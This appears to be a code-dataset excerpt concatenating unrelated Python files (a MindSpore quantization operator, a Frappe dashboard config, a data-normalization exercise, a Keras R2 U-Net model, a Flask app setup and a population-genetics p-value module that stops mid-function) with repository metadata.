Python
mindspore/ops/_op_impl/_custom_op/fake_quant_perchannel_grad.py
i4oolish/mindspore
dac3be31d0f2c0a3516200f47af30980e566601b
[ "Apache-2.0" ]
2
2020-08-12T16:14:40.000Z
2020-12-04T03:05:57.000Z
mindspore/ops/_op_impl/_custom_op/fake_quant_perchannel_grad.py
dilingsong/mindspore
4276050f2494cfbf8682560a1647576f859991e8
[ "Apache-2.0" ]
null
null
null
mindspore/ops/_op_impl/_custom_op/fake_quant_perchannel_grad.py
dilingsong/mindspore
4276050f2494cfbf8682560a1647576f859991e8
[ "Apache-2.0" ]
null
null
null
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """FakeQuantPerChannelGrad op""" import te.lang.cce from te import tvm from te.platform.fusion_manager import fusion_manager from topi import generic from topi.cce import util from mindspore.ops.op_info_register import op_info_register, TBERegOp, DataType SHAPE_SIZE_LIMIT = 2147483648 D_TYPE = 'float32' fake_quant_perchannel_grad_op_info = TBERegOp("FakeQuantPerChannelGrad") \ .fusion_type("OPAQUE") \ .async_flag(False) \ .binfile_name("fake_quant_perchannel_grad.so") \ .compute_cost(10) \ .kernel_name("fake_quant_perchannel_grad") \ .partial_flag(True) \ .attr("symmetric", "optional", "bool", "all") \ .attr("narrow_range", "optional", "bool", "all") \ .attr("num_bits", "optional", "int", "all") \ .attr("channel_axis", "optional", "int", "all") \ .input(0, "dout", None, "required", None) \ .input(1, "x", None, "required", None) \ .input(2, "min", None, "required", None) \ .input(3, "max", None, "required", None) \ .output(0, "dx", True, "required", "all") \ .dtype_format(DataType.F16_Default, DataType.F16_Default, DataType.F16_Default, DataType.F16_Default, DataType.F16_Default) \ .dtype_format(DataType.F16_5HD, DataType.F16_5HD, DataType.F16_5HD, DataType.F16_5HD, DataType.F16_5HD) \ .dtype_format(DataType.F32_Default, DataType.F32_Default, DataType.F32_Default, DataType.F32_Default, DataType.F32_Default) \ .dtype_format(DataType.F32_5HD, DataType.F32_5HD, DataType.F32_5HD, DataType.F32_5HD, DataType.F32_5HD) \ .get_op_info() def _less_compare_float32(data_x, data_y): """_less_compare_float32 compute""" input_shape = te.lang.cce.util.shape_to_list(data_x.shape) min_value = tvm.const(2 ** (-126), dtype=D_TYPE) max_value = tvm.const(2 ** 62, dtype=D_TYPE) factor_value = tvm.const(2 ** 2, dtype=D_TYPE) data_zero = te.lang.cce.broadcast( tvm.const(0, dtype=D_TYPE), input_shape, D_TYPE) min_value_tensor = te.lang.cce.vadds(data_zero, min_value) res_sub = te.lang.cce.vsub(data_y, data_x) res_min = te.lang.cce.vmin(res_sub, min_value_tensor) res_max = te.lang.cce.vmax(res_min, data_zero) res_max_mul = te.lang.cce.vmuls(res_max, max_value) res_max_mul_max = te.lang.cce.vmuls(res_max_mul, max_value) res = te.lang.cce.vmuls(res_max_mul_max, factor_value) return res @op_info_register(fake_quant_perchannel_grad_op_info) def _fake_quant_perchannel_grad_tbe(): """FakeQuantPerChannelGrad TBE register""" return @fusion_manager.register("fake_quant_perchannel_grad") def fake_quant_perchannel_grad_compute(dout, x, min_val, max_val, quant_min, quant_max, kernel_name="fake_quant_perchannel_grad"): """FakeQuantPerChannelGrad""" x_shape = te.lang.cce.util.shape_to_list(x.shape) minmax_shape = te.lang.cce.util.shape_to_list(min_val.shape) quant_min = tvm.const(quant_min, x.dtype) quant_max = tvm.const(quant_max, x.dtype) quant_min = te.lang.cce.broadcast(quant_min, minmax_shape, x.dtype) quant_max = te.lang.cce.broadcast(quant_max, minmax_shape, x.dtype) # CalNudge(NudgeMinMax) scale = te.lang.cce.vdiv(te.lang.cce.vsub( max_val, min_val), te.lang.cce.vsub(quant_max, quant_min)) zp_from_min = te.lang.cce.vsub(quant_min, te.lang.cce.vdiv(min_val, scale)) # Nudge zero point nudge_zp_ = te.lang.cce.vmin( quant_max, te.lang.cce.vmax(quant_min, zp_from_min)) nudge_zp = te.lang.cce.floor(te.lang.cce.vadds(nudge_zp_, 0.5)) nudge_min = te.lang.cce.vmul(te.lang.cce.vsub(quant_min, nudge_zp), scale) nudge_max = te.lang.cce.vmul(te.lang.cce.vsub(quant_max, nudge_zp), scale) # FakeQuant Grad nudge_min_b = te.lang.cce.broadcast(nudge_min, x_shape) nudge_max_b = te.lang.cce.broadcast(nudge_max, x_shape) bool_over_min = _less_compare_float32(nudge_min_b, x) bool_less_max = _less_compare_float32(x, nudge_max_b) bool_between = te.lang.cce.vmul(bool_over_min, bool_less_max) res = te.lang.cce.vmul(dout, bool_between) return res @util.check_input_type(dict, dict, dict, dict, dict, bool, bool, int, int, str) def fake_quant_perchannel_grad(dout, x, min_val, max_val, dx, symmetric, narrow_range, num_bits, channel_axis, kernel_name="fake_quant_perchannel_grad"): """FakeQuantPerChannelGrad""" x_shape = x.get("shape") x_shape_ = x.get("ori_shape") x_format = x.get("format") x_dtype = x.get("dtype") min_shape = min_val.get("ori_shape") min_dtype = min_val.get("dtype") max_shape = max_val.get("ori_shape") max_dtype = max_val.get("dtype") # for Dense weight quant, 2d[co,ci] -> 4d[1,co,ci,1], channel_axis_ need change to 1. if channel_axis == 0 and x_shape_[0] != min_shape[0] and x_shape_[1] == min_shape[0]: channel_axis_ = 1 else: channel_axis_ = channel_axis util.check_kernel_name(kernel_name) util.check_shape_rule(x_shape) util.check_shape_rule(min_shape, 1, 1, x_shape_[channel_axis_]) util.check_shape_rule(max_shape, 1, 1, x_shape_[channel_axis_]) util.check_tensor_shape_size(x_shape) util.check_tensor_shape_size(min_shape) util.check_tensor_shape_size(max_shape) check_list = ["float32", "float16"] x_dtype = x_dtype.lower() min_dtype = min_dtype.lower() max_dtype = max_dtype.lower() util.check_dtype_rule(x_dtype, check_list) util.check_dtype_rule(min_dtype, check_list) util.check_dtype_rule(max_dtype, check_list) if symmetric: quant_min = 0 - 2 ** (num_bits - 1) quant_max = 2 ** (num_bits - 1) - 1 else: quant_min = 0 quant_max = 2 ** num_bits - 1 if narrow_range: quant_min = quant_min + 1 shape_c = [1] * len(x_shape) shape_c[channel_axis_] = min_val.get("ori_shape")[0] if x_format == "NC1HWC0" and channel_axis_ == 1: shape_c = min_val.get("shape") dout_data = tvm.placeholder(x_shape, name="dout", dtype=x_dtype) input_data = tvm.placeholder(x_shape, name="x", dtype=x_dtype) min_data = tvm.placeholder(shape_c, name="min_val", dtype=x_dtype) max_data = tvm.placeholder(shape_c, name="max_val", dtype=x_dtype) res = fake_quant_perchannel_grad_compute(dout_data, input_data, min_data, max_data, quant_min, quant_max, kernel_name) with tvm.target.cce(): sch = generic.auto_schedule(res) tensor_list = [dout_data, input_data, min_data, max_data, res] config = {"print_ir": False, "name": kernel_name, "tensor_list": tensor_list} te.lang.cce.cce_build_code(sch, config)
41.903955
109
0.687205
795aabe00048f14b4cc81151100147c494a5b0cc
272
py
Python
rama_aluminium/config/serial_no_dashboard.py
ashish-greycube/rama_aluminium
0eb1d39a16e79bb8a1a3e7c5b62252b916dad2ad
[ "MIT" ]
null
null
null
rama_aluminium/config/serial_no_dashboard.py
ashish-greycube/rama_aluminium
0eb1d39a16e79bb8a1a3e7c5b62252b916dad2ad
[ "MIT" ]
null
null
null
rama_aluminium/config/serial_no_dashboard.py
ashish-greycube/rama_aluminium
0eb1d39a16e79bb8a1a3e7c5b62252b916dad2ad
[ "MIT" ]
null
null
null
from __future__ import unicode_literals from frappe import _ def get_data(data): return { 'fieldname': 'serial_no', 'non_standard_fieldnames': { 'Daily Press':'die' }, 'transactions': [ { 'items': ['Daily Press'] }, ] }
18.133333
39
0.569853
795aac98c56bff148027a0c082fc0d1efbe348f7
772
py
Python
exer1/task4.py
farhad200013/machine_learning
9ce27650f677246783e04299b1565d6f2106c3e6
[ "MIT" ]
null
null
null
exer1/task4.py
farhad200013/machine_learning
9ce27650f677246783e04299b1565d6f2106c3e6
[ "MIT" ]
null
null
null
exer1/task4.py
farhad200013/machine_learning
9ce27650f677246783e04299b1565d6f2106c3e6
[ "MIT" ]
1
2020-08-19T20:50:04.000Z
2020-08-19T20:50:04.000Z
# -*- coding: utf-8 -*- """ Created on Thu Jan 12 15:25:14 2017 @author: aliTakin """ # this is task 4 from scipy.io import loadmat import matplotlib.pyplot as plt import numpy as np mat = loadmat(r"C:\Users\aliTakin\Desktop\4.92\sgn_41007\twoClassData.mat") print(mat.keys()) # Which variables mat contains? X = mat["X"] # Collect the two variables. y = mat["y"].ravel() X_zero = X[y==0, :] X_one = X[y==1, :] plt.plot(X_zero[:, 0], X_zero[:, 1], 'ro') plt.plot(X_one[:, 0], X_one[:, 1], 'bo') plt.show() def normalize_data(X): return(X - X.mean(axis = 0)) / X.std(axis = 0) X_norm = normalize_data(X) X_norm = normalize_data(X) print(np.mean(X_norm, axis = 0)) # Should be 0 print(np.std(X_norm, axis = 0)) # Should be 1
20.315789
75
0.61658
795aad7a46b047e0255a38b5330184156872b484
11,903
py
Python
swiss_army_keras/_model_r2_unet_2d.py
desmoteo/swiss-army-keras
811d5991cb6d7d9808e57617a24b501479a78b86
[ "MIT" ]
1
2022-02-23T13:54:22.000Z
2022-02-23T13:54:22.000Z
swiss_army_keras/_model_r2_unet_2d.py
waterviewsrl/swiss-army-keras
49578f1a45761229756a8adbfcf692728039dc3b
[ "MIT" ]
null
null
null
swiss_army_keras/_model_r2_unet_2d.py
waterviewsrl/swiss-army-keras
49578f1a45761229756a8adbfcf692728039dc3b
[ "MIT" ]
null
null
null
from __future__ import absolute_import from swiss_army_keras.layer_utils import * from swiss_army_keras.activations import GELU, Snake from tensorflow.keras.layers import Input from tensorflow.keras.models import Model def RR_CONV(X, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', batch_norm=False, name='rr'): ''' Recurrent convolutional layers with skip connection. RR_CONV(X, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', batch_norm=False, name='rr') Input ---------- X: input tensor. channel: number of convolution filters. kernel_size: size of 2-d convolution kernels. stack_num: number of stacked recurrent convolutional layers. recur_num: number of recurrent iterations. activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interfaces, e.g., 'ReLU'. batch_norm: True for batch normalization, False otherwise. name: prefix of the created keras layers. Output ---------- X: output tensor. ''' activation_func = eval(activation) layer_skip = Conv2D(channel, 1, name='{}_conv'.format(name))(X) layer_main = layer_skip for i in range(stack_num): layer_res = Conv2D(channel, kernel_size, padding='same', name='{}_conv{}'.format(name, i))(layer_main) if batch_norm: layer_res = BatchNormalization(name='{}_bn{}'.format(name, i))(layer_res) layer_res = activation_func(name='{}_activation{}'.format(name, i))(layer_res) for j in range(recur_num): layer_add = add([layer_res, layer_main], name='{}_add{}_{}'.format(name, i, j)) layer_res = Conv2D(channel, kernel_size, padding='same', name='{}_conv{}_{}'.format(name, i, j))(layer_add) if batch_norm: layer_res = BatchNormalization(name='{}_bn{}_{}'.format(name, i, j))(layer_res) layer_res = activation_func(name='{}_activation{}_{}'.format(name, i, j))(layer_res) layer_main = layer_res out_layer = add([layer_main, layer_skip], name='{}_add{}'.format(name, i)) return out_layer def UNET_RR_left(X, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', pool=True, batch_norm=False, name='left0'): ''' The encoder block of R2U-Net. UNET_RR_left(X, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', pool=True, batch_norm=False, name='left0') Input ---------- X: input tensor. channel: number of convolution filters. kernel_size: size of 2-d convolution kernels. stack_num: number of stacked recurrent convolutional layers. recur_num: number of recurrent iterations. activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interfaces, e.g., 'ReLU'. pool: True or 'max' for MaxPooling2D. 'ave' for AveragePooling2D. False for strided conv + batch norm + activation. batch_norm: True for batch normalization, False otherwise. name: prefix of the created keras layers. Output ---------- X: output tensor. *downsampling is fixed to 2-by-2, e.g., reducing feature map sizes from 64-by-64 to 32-by-32 ''' pool_size = 2 # maxpooling layer vs strided convolutional layers X = encode_layer(X, channel, pool_size, pool, activation=activation, batch_norm=batch_norm, name='{}_encode'.format(name)) # stack linear convolutional layers X = RR_CONV(X, channel, stack_num=stack_num, recur_num=recur_num, activation=activation, batch_norm=batch_norm, name=name) return X def UNET_RR_right(X, X_list, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', unpool=True, batch_norm=False, name='right0'): ''' The decoder block of R2U-Net. UNET_RR_right(X, X_list, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', unpool=True, batch_norm=False, name='right0') Input ---------- X: input tensor. X_list: a list of other tensors that connected to the input tensor. channel: number of convolution filters. kernel_size: size of 2-d convolution kernels. stack_num: number of stacked recurrent convolutional layers. recur_num: number of recurrent iterations. activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interfaces, e.g., 'ReLU'. unpool: True or 'bilinear' for Upsampling2D with bilinear interpolation. 'nearest' for Upsampling2D with nearest interpolation. False for Conv2DTranspose + batch norm + activation. batch_norm: True for batch normalization, False otherwise. name: prefix of the created keras layers. Output ---------- X: output tensor ''' pool_size = 2 X = decode_layer(X, channel, pool_size, unpool, activation=activation, batch_norm=batch_norm, name='{}_decode'.format(name)) # linear convolutional layers before concatenation X = CONV_stack(X, channel, kernel_size, stack_num=1, activation=activation, batch_norm=batch_norm, name='{}_conv_before_concat'.format(name)) # Tensor concatenation H = concatenate([X,]+X_list, axis=-1, name='{}_concat'.format(name)) # stacked linear convolutional layers after concatenation H = RR_CONV(H, channel, stack_num=stack_num, recur_num=recur_num, activation=activation, batch_norm=batch_norm, name=name) return H def r2_unet_2d_base(input_tensor, filter_num, stack_num_down=2, stack_num_up=2, recur_num=2, activation='ReLU', batch_norm=False, pool=True, unpool=True, name='res_unet'): ''' The base of Recurrent Residual (R2) U-Net. r2_unet_2d_base(input_tensor, filter_num, stack_num_down=2, stack_num_up=2, recur_num=2, activation='ReLU', batch_norm=False, pool=True, unpool=True, name='res_unet') ---------- Alom, M.Z., Hasan, M., Yakopcic, C., Taha, T.M. and Asari, V.K., 2018. Recurrent residual convolutional neural network based on u-net (r2u-net) for medical image segmentation. arXiv preprint arXiv:1802.06955. Input ---------- input_tensor: the input tensor of the base, e.g., `keras.layers.Inpyt((None, None, 3))`. filter_num: a list that defines the number of filters for each \ down- and upsampling levels. e.g., `[64, 128, 256, 512]`. The depth is expected as `len(filter_num)`. stack_num_down: number of stacked recurrent convolutional layers per downsampling level/block. stack_num_down: number of stacked recurrent convolutional layers per upsampling level/block. recur_num: number of recurrent iterations. activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interfaces, e.g., 'ReLU'. batch_norm: True for batch normalization. pool: True or 'max' for MaxPooling2D. 'ave' for AveragePooling2D. False for strided conv + batch norm + activation. unpool: True or 'bilinear' for Upsampling2D with bilinear interpolation. 'nearest' for Upsampling2D with nearest interpolation. False for Conv2DTranspose + batch norm + activation. name: prefix of the created keras layers. Output ---------- X: output tensor. ''' activation_func = eval(activation) X = input_tensor X_skip = [] # downsampling blocks X = RR_CONV(X, filter_num[0], stack_num=stack_num_down, recur_num=recur_num, activation=activation, batch_norm=batch_norm, name='{}_down0'.format(name)) X_skip.append(X) for i, f in enumerate(filter_num[1:]): X = UNET_RR_left(X, f, kernel_size=3, stack_num=stack_num_down, recur_num=recur_num, activation=activation, pool=pool, batch_norm=batch_norm, name='{}_down{}'.format(name, i+1)) X_skip.append(X) # upsampling blocks X_skip = X_skip[:-1][::-1] for i, f in enumerate(filter_num[:-1][::-1]): X = UNET_RR_right(X, [X_skip[i],], f, stack_num=stack_num_up, recur_num=recur_num, activation=activation, unpool=unpool, batch_norm=batch_norm, name='{}_up{}'.format(name, i+1)) return X def r2_unet_2d(input_size, filter_num, n_labels, stack_num_down=2, stack_num_up=2, recur_num=2, activation='ReLU', output_activation='Softmax', batch_norm=False, pool=True, unpool=True, name='r2_unet'): ''' Recurrent Residual (R2) U-Net r2_unet_2d(input_size, filter_num, n_labels, stack_num_down=2, stack_num_up=2, recur_num=2, activation='ReLU', output_activation='Softmax', batch_norm=False, pool=True, unpool=True, name='r2_unet') ---------- Alom, M.Z., Hasan, M., Yakopcic, C., Taha, T.M. and Asari, V.K., 2018. Recurrent residual convolutional neural network based on u-net (r2u-net) for medical image segmentation. arXiv preprint arXiv:1802.06955. Input ---------- input_size: the size/shape of network input, e.g., `(128, 128, 3)`. filter_num: a list that defines the number of filters for each \ down- and upsampling levels. e.g., `[64, 128, 256, 512]`. The depth is expected as `len(filter_num)`. n_labels: number of output labels. stack_num_down: number of stacked recurrent convolutional layers per downsampling level/block. stack_num_down: number of stacked recurrent convolutional layers per upsampling level/block. recur_num: number of recurrent iterations. activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interfaces, e.g., 'ReLU'. output_activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interface or 'Sigmoid'. Default option is 'Softmax'. if None is received, then linear activation is applied. batch_norm: True for batch normalization. pool: True or 'max' for MaxPooling2D. 'ave' for AveragePooling2D. False for strided conv + batch norm + activation. unpool: True or 'bilinear' for Upsampling2D with bilinear interpolation. 'nearest' for Upsampling2D with nearest interpolation. False for Conv2DTranspose + batch norm + activation. name: prefix of the created keras layers. Output ---------- model: a keras model. ''' activation_func = eval(activation) IN = Input(input_size, name='{}_input'.format(name)) # base X = r2_unet_2d_base(IN, filter_num, stack_num_down=stack_num_down, stack_num_up=stack_num_up, recur_num=recur_num, activation=activation, batch_norm=batch_norm, pool=pool, unpool=unpool, name=name) # output layer OUT = CONV_output(X, n_labels, kernel_size=1, activation=output_activation, name='{}_output'.format(name)) # functional API model model = Model(inputs=[IN], outputs=[OUT], name='{}_model'.format(name)) return model
42.510714
126
0.625305
795ab08eb809edc62b5300b19cfdf01e5bee9c9d
1,024
py
Python
__init__.py
Ryize/it-news
a77f5ba37d665d902f229e6411145050db93e5c9
[ "Apache-2.0" ]
2
2021-12-20T16:57:41.000Z
2021-12-20T17:00:19.000Z
__init__.py
Ryize/it-news
a77f5ba37d665d902f229e6411145050db93e5c9
[ "Apache-2.0" ]
null
null
null
__init__.py
Ryize/it-news
a77f5ba37d665d902f229e6411145050db93e5c9
[ "Apache-2.0" ]
null
null
null
from flask import Flask, flash, redirect, render_template, request, url_for, session, escape, make_response from flask_sqlalchemy import SQLAlchemy from flask_login import LoginManager, UserMixin from flask_login import login_user, login_required, logout_user from loguru import logger from hashlib import md5 from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText import re import os import smtplib import random import datetime application = Flask(__name__) application.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('db_connector') application.config['SECRET_KEY'] = 'KRp3SWo8W57zUWh8n921ZX61V632j6mo0G1Bv3b829cw4Qz14B08MI2KO6327SlJ' application.config['MAX_CONTENT_LENGTH'] = 1024 * 1024 logger.add('logs/log.txt', format=''' δΞ[{time}] [{level}] {message}''', level='DEBUG', rotation='10 MB', compression='zip') email = os.getenv('email') password = os.getenv('email_password') db = SQLAlchemy(application) manager = LoginManager(application) from models import * from routes import *
32
107
0.801758
795ab0b7666874ff0199b44cef73460aad9dda81
213
py
Python
airzus/urls.py
allenamusin/metadata-verifier
7b2c61c231c49c722d1db9c9e83f157b6e2439f4
[ "MIT" ]
null
null
null
airzus/urls.py
allenamusin/metadata-verifier
7b2c61c231c49c722d1db9c9e83f157b6e2439f4
[ "MIT" ]
11
2020-02-12T03:26:35.000Z
2022-02-10T12:01:00.000Z
airzus/urls.py
allenamusin/metadata-verifier
7b2c61c231c49c722d1db9c9e83f157b6e2439f4
[ "MIT" ]
null
null
null
from django.contrib import admin from django.urls import path, include urlpatterns = [ path('admin/', admin.site.urls), path('accounts/', include('allauth.urls')), path('', include('pages.urls')), ]
23.666667
47
0.666667
795ab33683b1ef997151102034bf0e566cdaa2d3
22,126
py
Python
sstar/cal_pvalue.py
admixVIE/sstar
58db7647612cd6801a3570681e1f5a240d9c7050
[ "Apache-2.0" ]
null
null
null
sstar/cal_pvalue.py
admixVIE/sstar
58db7647612cd6801a3570681e1f5a240d9c7050
[ "Apache-2.0" ]
null
null
null
sstar/cal_pvalue.py
admixVIE/sstar
58db7647612cd6801a3570681e1f5a240d9c7050
[ "Apache-2.0" ]
null
null
null
# Apache License Version 2.0 # Copyright 2022 Xin Huang # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import allel import gzip import os import numpy as np import pandas as pd from multiprocessing import Process, Queue from sstar.utils import read_data, py2round, read_mapped_region_file, cal_match_pct #@profile def cal_pvalue(vcf, ref_ind_file, tgt_ind_file, src_ind_file, anc_allele_file, output, thread, score_file, ref_match_pct_file, mapped_region_file, low_memory, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Calculate p-values for S* haplotypes in the target population with source genomes. Arguments: vcf str: Name of the VCF file containing genotypes. src_vcf str: Name of the VCF file containing genotypes from source populations. ref_ind_file str: Name of the file containing sample information from reference populations. tgt_ind_file str: Name of the file containing sample information from target populations. src_ind_file str: Name of the file containing sample information from source populations. anc_allele_file str: Name of the file containing ancestral allele information. output str: Name of the output file. thread int: Number of threads. score_file str: Name of the file containing S* scores calculated by `s-star score`. ref_match_pct_file str: Names of the files containing match percents in reference populations calculated by `s-star rmatch`. mapped_region_file str: Name of the BED file containing mapped regions. mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. """ ref_data, ref_samples, tgt_data, tgt_samples, src_data, src_samples = read_data(vcf, ref_ind_file, tgt_ind_file, src_ind_file, anc_allele_file) res = [] chr_names = ref_data.keys() mapped_intervals = read_mapped_region_file(mapped_region_file) data, windows, samples = _read_score_file(score_file, chr_names, tgt_samples) sample_size = len(samples) header = 'chrom\tstart\tend\tsample\tp-value\t' header += 'src_sample\thap_index\tS*_start\tS*_end\tS*_SNP_num\t' header += "hap_dSNV_num\thap_len\thap_mapped_len\thap_match_num\thap_tot_num\thap_dSNP_per_site_num\thap_S*_match(%)\thap_num_match_ref" # Read match percents in reference populations from a file # Use whole-genome match percents as the null distributions if low_memory: try: ref_match_pct = pd.read_csv(ref_match_pct_file, compression="gzip", sep="\t") except: ref_match_pct = pd.read_csv(ref_match_pct_file, sep="\t") query_ref_match_pct = _query_ref_match_pct_pandas else: ref_match_pct = _read_ref_match_pct_file(ref_match_pct_file) query_ref_match_pct = _query_ref_match_pct_naive #for s in samples[0:1]: # i = samples.index(s) # res = _cal_pvalue_ind(data[s], i, mapped_intervals, tgt_data, src_data, src_samples, ref_match_pct, sample_size, query_ref_match_pct, mapped_len_esp, len_esp, var_esp, sfs_esp) if thread is None: thread = min(os.cpu_count()-1, sample_size) res = _cal_tgt_match_pct_manager(data, mapped_intervals, samples, tgt_samples, src_samples, tgt_data, src_data, ref_match_pct, sample_size, query_ref_match_pct, thread, mapped_len_esp, len_esp, var_esp, sfs_esp) with open(output, 'w') as o: o.write(header+"\n") o.write("\n".join(res)+"\n") #@profile def _read_score_file(score_file, chr_names, tgt_samples): """ Description: Helper function for reading the file generated by `sstar score`. Arguments: score_file str: Name of the file containing S* scores generated by `sstar score`. chr_names list: List containing names of chromosomes for analysis. tgt_samples list: List containing names of samples from the target population for analysis. Returns: data dict: Dictionary containing S* for analysis. windows dict: Dictionary containing windows for analysis. header str: Header from the file generated by `sstar score`. samples list: List containing names of samples in the target population for analysis. """ data = dict() windows = dict() for c in chr_names: windows[c] = [] samples = [] with open(score_file, 'r') as f: header = f.readline().rstrip() for line in f.readlines(): line = line.rstrip() elements = line.split("\t") chr_name = elements[0] win_start = elements[1] win_end = elements[2] sample = elements[3] if sample not in tgt_samples: continue if elements[6] == 'NA': continue if sample not in data.keys(): data[sample] = [] samples.append(sample) data[sample].append(line) star_snps = elements[-1].split(",") windows[c].append((int(win_start), int(win_end))) windows[c].append((int(star_snps[0]), int(star_snps[-1]))) return data, windows, samples #@profile def _read_ref_match_pct_file(ref_match_pct_file): """ Description: Helper function for reading match percents from the reference population. Arguments: ref_match_pct_file str: Name of the file containing match percents from the reference population. Returns: ref_match_pct dict: Dictionary containing match percents from the reference population. """ f = gzip.open(ref_match_pct_file, 'rt') try: f.readline() except: f.close() f = open(ref_match_pct_file, 'r') f.readline() ref_match_pct = dict() for line in f.readlines(): elements = line.rstrip().split("\t") count = int(elements[0]) mapped_bases_bin = int(elements[1]) hap_len = int(elements[2]) mh_sites = int(elements[3]) tot_sites = int(elements[4]) sfs = float(elements[5]) match = float(elements[6]) if mapped_bases_bin not in ref_match_pct.keys(): ref_match_pct[mapped_bases_bin] = dict() if hap_len not in ref_match_pct[mapped_bases_bin].keys(): ref_match_pct[mapped_bases_bin][hap_len] = dict() if mh_sites not in ref_match_pct[mapped_bases_bin][hap_len].keys(): ref_match_pct[mapped_bases_bin][hap_len][mh_sites] = dict() if sfs not in ref_match_pct[mapped_bases_bin][hap_len][mh_sites].keys(): ref_match_pct[mapped_bases_bin][hap_len][mh_sites][sfs] = dict() ref_match_pct[mapped_bases_bin][hap_len][mh_sites][sfs]['count'] = [] ref_match_pct[mapped_bases_bin][hap_len][mh_sites][sfs]['match_pct'] = [] ref_match_pct[mapped_bases_bin][hap_len][mh_sites][sfs]['count'].append(count) ref_match_pct[mapped_bases_bin][hap_len][mh_sites][sfs]['match_pct'].append(match / tot_sites) f.close() return ref_match_pct def _cal_tgt_match_pct_manager(data, mapped_intervals, samples, tgt_samples, src_samples, tgt_data, src_data, ref_match_pct, sample_size, query_ref_match_pct, thread, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Manager function to calculate match percents in target populations using multiprocessing. Arguments: data dict: Lines from the output file created by `sstar score`. mapped_intervals dict: Dictionary of tuples containing mapped regions across the genome. sample list: Sample information for individuals needed to be estimated match percents. tgt_samples list: Sample information from target populations. src_samples list: Sample information from source populations. tgt_data dict: Genotype data from target populations. src_data dict: Genotype data from source populations. ref_match_pct dict: Match percents calculated from reference populations. sample_size int: Number of individuals analyzed. query_ref_match_pct func: Function used to query match percentage from reference populations. thread int: Number of threads. mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. Returns: res list: Match percents for target populations. """ try: from pytest_cov.embed import cleanup_on_sigterm except ImportError: pass else: cleanup_on_sigterm() res = [] in_queue, out_queue = Queue(), Queue() workers = [Process(target=_cal_tgt_match_pct_worker, args=(in_queue, out_queue, mapped_intervals, tgt_data, src_data, src_samples, ref_match_pct, len(tgt_samples), query_ref_match_pct, mapped_len_esp, len_esp, var_esp, sfs_esp)) for ii in range(thread)] for t in samples: index = tgt_samples.index(t) in_queue.put((index, data[t])) try: for worker in workers: worker.start() for s in range(sample_size): item = out_queue.get() if item != '': res.append(item) for worker in workers: worker.terminate() finally: for worker in workers: worker.join() return res def _cal_tgt_match_pct_worker(in_queue, out_queue, mapped_intervals, tgt_data, src_data, src_samples, ref_match_pct, sample_size, query_ref_match_pct, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Worker function to calculate match percents in target populations. Arguments: in_queue multiprocessing.Queue: multiprocessing.Queue instance to receive parameters from the manager. out_queue multiprocessing.Queue: multiprocessing.Queue instance to send results back to the manager. mapped_intervals dict: Dictionary of tuples containing mapped regions across the genome. tgt_data dict: Genotype data from target populations. src_data dict: Genotype data from source populations. src_samples list: List containing sample information for source populations. ref_match_pct dict: Match percents in reference populations as the null distribution. sample_size int: Number of individuals analyzed. query_ref_match_pct func: Function used to query match percentages from reference popualtions. mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. """ while True: index, data = in_queue.get() res = _cal_pvalue_ind(data, index, mapped_intervals, tgt_data, src_data, src_samples, ref_match_pct, sample_size, query_ref_match_pct, mapped_len_esp, len_esp, var_esp, sfs_esp) out_queue.put("\n".join(res)) #@profile def _get_ssnps_range(chr_name, data, ind_index, hap_index, win_start, win_end, s_star_snps): """ Description: Helper function to obtain the range of a haplotype containing S* SNPs. If the haplotype contains less than two S* SNPs, it will be ignored. Arguments: chr_name str: Name of the chromosome. data dict: Dictionary containing genotype data and position information. ind_index int: Index of the individual carrying S* SNPs. hap_index int: Index of the haplotype carrying S* SNPs. win_start int: Start position of the local window containing S* SNPs. wind_end int: End position of the local window containing S* SNPs. s_star_snps list: List containing positions of S* SNPs. Returns: hap_pos_min int: Start position of the haplotype. hap_pos_max int: End position of the haplotype. """ gt = data[chr_name]['GT'] pos = data[chr_name]['POS'] sub_snps = np.where((pos>=win_start) & (pos<=win_end))[0] sub_gt = gt[sub_snps][:,ind_index] sub_pos = pos[sub_snps] hap = sub_gt[:,hap_index] s_star_snps_pos = [int(s) for s in s_star_snps] index = np.in1d(sub_pos, s_star_snps_pos) hap_num = np.sum(hap[index]) if hap_num < 2: hap_pos_max = 'NA' hap_pos_min = 'NA' else: hap_pos_max = int(np.array(s_star_snps_pos)[np.equal(hap[index],1)][-1]) hap_pos_min = 